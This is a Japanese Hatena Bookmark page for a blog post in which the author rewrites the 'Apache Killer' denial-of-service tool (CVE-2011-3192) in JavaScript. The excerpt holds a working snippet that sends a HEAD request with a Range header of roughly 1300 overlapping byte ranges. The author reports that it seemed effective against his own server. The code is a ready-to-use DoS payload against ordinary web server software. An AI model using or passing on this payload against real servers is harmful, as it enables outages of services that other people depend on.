エントリーの編集
![loading...](https://b.st-hatena.com/bdefb8944296a0957e54cebcfefc25c4dcff9f5f/images/v4/public/common/loading@2x.gif)
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
Apache KillerのJS版作ってみた - ASnoKaze blog
記事へのコメント0件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
![アプリのスクリーンショット](https://b.st-hatena.com/bdefb8944296a0957e54cebcfefc25c4dcff9f5f/images/v4/public/entry/app-screenshot.png)
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
Apache KillerのJS版作ってみた - ASnoKaze blog
Apache KillerというApacheの脆弱性(CVE-2011-3192)をつくDoSツールが出回ってますね。 ソースも割りと... Apache KillerというApacheの脆弱性(CVE-2011-3192)をつくDoSツールが出回ってますね。 ソースも割りと簡単に手に入るので読んでみたところ、結構単純なHTTPリクエストを送ってるだけだった。これはJSで書き直せると思ってJSで書き直してみた。特に意味はない。 p="bytes=0-"; for(k=0;k<1300;k++) p+= ",5-"+k; xhr=new XMLHttpRequest(); xhr.open("head","/"); xhr.setRequestHeader("range",p); xhr.send();本家ではこれに加えて ・Accept-Encoding: gzip ・Connection: close を指定しているが、XHRの制限上できないので省略。 自鯖で試したところ確かに効果がありそう(ちゃんと測定したわけじゃないが)